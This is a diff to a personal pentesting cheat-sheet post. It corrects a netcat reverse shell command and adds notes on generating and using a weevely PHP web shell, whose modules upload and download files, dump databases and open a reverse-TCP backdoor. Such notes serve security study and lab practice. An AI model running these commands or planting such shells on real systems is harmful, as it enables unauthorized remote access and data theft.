--- a/_posts/notes/system/2022-04-25-bash.md
+++ b/_posts/notes/system/2022-04-25-bash.md
@@ -7,13 +7,37 @@ permalink: /notes/system/bash/
 # Reverse Shell
 If we can execute code in the victim:
 {% highlight bash %}
-... nc -e /bin/sh <ip>:<port>
+... nc -e /bin/sh <ip> <port>
 {% endhighlight %}
 
 While in the attacker:
 {% highlight bash %}
 > nc -lvnp <port>
 {% endhighlight %}
+
+## weevely
+To generate a shell:
+{% highlight bash %}
+> weevely generate [password] /home/kali/shell.php
+> weevely http://ip/shell.php [password]
+{% endhighlight %}
+
+We can use **:help** inside the weevely shell to get some functions. We can use **-h** in the weevely function to access more options.
+Sometimes we wouldn't be able to execute commands, weevely can help us:
+{% highlight bash %}
+> :shell_sh -v [option] [command]
+{% endhighlight %}
+
+Some other options are:
+- **:file_download [remotepath] [localpath]**: download files
+- **:file_upload [localpath] [remotepath]**: upload files
+- **:file_read [localpath]**: read a file
+- **:sql_console**
+- **:sql_dump -host [ip] -lpath [localpath].txt [user] [password]**: dump a db into a file (if the db doesn't have a password we should use **''** instead).
+- **:backdoor_reversetcp [lhost] [lport]**: create a reverse shell (we need to add a **;** after each command).
+##### If any option doesn't work we can use **-vector [option]** to change the attack.
+
+---
 
 # After a reverse shell...
 We can get a interactive shell with the following command:
